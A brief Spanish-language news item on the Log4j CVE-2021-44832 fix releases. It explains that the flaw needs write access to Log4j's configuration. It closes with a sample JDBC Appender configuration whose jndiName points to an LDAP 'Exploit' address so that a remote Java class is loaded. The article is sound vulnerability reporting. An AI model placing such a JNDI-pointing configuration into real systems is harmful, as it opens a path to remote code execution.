Se han publicado versiones correctivas de la biblioteca Log4j 2.17.1, 2.3.2-rc1 y 2.12.4-rc1, que corrigen otra vulnerabilidad (CVE-2021-44832). Se menciona que el problema permite la ejecución remota de código (RCE), aunque se considera de bajo riesgo (puntuación CVSS 6.6) y principalmente tiene solo un interés teórico, ya que requiere condiciones específicas para su explotación: el atacante debe poder modificar el archivo de configuración de Log4j, es decir, debe tener acceso al sistema atacado y privilegios para cambiar el valor del parámetro de configuración log4j2.configurationFile o para realizar cambios en archivos existentes de configuración de registro.
El ataque consiste en determinar en el sistema local la configuración basada en JDBC Appender que se refiere a un URI JNDI externo, el cual al ser consultado podría devolver una clase Java para su ejecución. Por defecto, JDBC Appender no está configurado para manejar protocolos distintos de Java, es decir, sin cambios en la configuración la explotación no es posible. Además, el problema solo se manifiesta en el archivo JAR log4j-core y no afecta a las aplicaciones que utilizan el archivo JAR log4j-api sin log4j-core. <Appenders> <JDBC name=»databaseAppender» tableName=»dbo.application_log»> <DataSource jndiName=»ldap://127.0.0.1:1389/Exploit»/> … <\/JDBC> <\/Appenders>
Fuente: opennet.ru
